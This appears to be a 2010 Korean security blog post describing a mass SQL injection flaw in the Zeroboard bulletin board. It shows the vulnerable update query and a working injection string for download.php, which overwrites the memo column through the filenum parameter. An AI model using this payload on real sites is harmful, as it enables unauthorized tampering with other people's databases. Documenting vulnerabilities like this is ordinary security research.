Zeroboard에서 발생한 Mass Sql Injection

Notice

Category

분류 전체보기 (211)

programming (34)

tips (34)

tool (5)

백do어 (0)

webhxxx (42)

metasploit (4)

snort (15)

windows (15)

hooking (5)

xx (0)

sample (1)

VoIP (2)

rexxxxx (3)

doc (12)

SMB연구 (0)

iphone (2)

vulnerability (17)

용어정리 (0)

pdf (1)

img (0)

이력 (0)

fuzzing (4)

network (1)

firewall (0)

linux (2)

Project (1)

dlp (1)

morse (1)

idea (0)

telegram (0)

SNS (2)

Computer Vision (0)

정보통신 (0)

wireshark (1)

Recent Trackbacks

Zeroboard에서 발생한 Mass Sql Injection

vulnerability 2010. 1. 26. 18:01 |

참고: http://www.securityplus.or.kr/xe/?document_srl=17273&vid=bangrip1

취약쿼리실행

update zetyx_board_id set downloadXXX=downloadXXX+1 where no='6'

공격문
download.php?id=id&filenum=1=download1,memo= concat(char(67),char(79),char(68),char(69))%23&no=6

1=download1 의 경우 임의의 문자삽입 가능
예)
2=111

'vulnerability' 카테고리의 다른 글

LNK 파일 생성기(Windows LNK Vulnerability) (1)	2010.07.27
html file upload form (0)	2010.06.24
Java Deployment Toolkit Test Page (0)	2010.04.19
XE 1.4.0.10 XSS/CSRF 취약점 (0)	2010.04.16
FCK Editor (0)	2010.04.11

Posted by applicationlayer

applicationlayer

Notice

Category

Tags

Recent Posts

Recent Comments

Recent Trackbacks

Archives

Links

Zeroboard에서 발생한 Mass Sql Injection

'vulnerability' 카테고리의 다른 글

티스토리툴바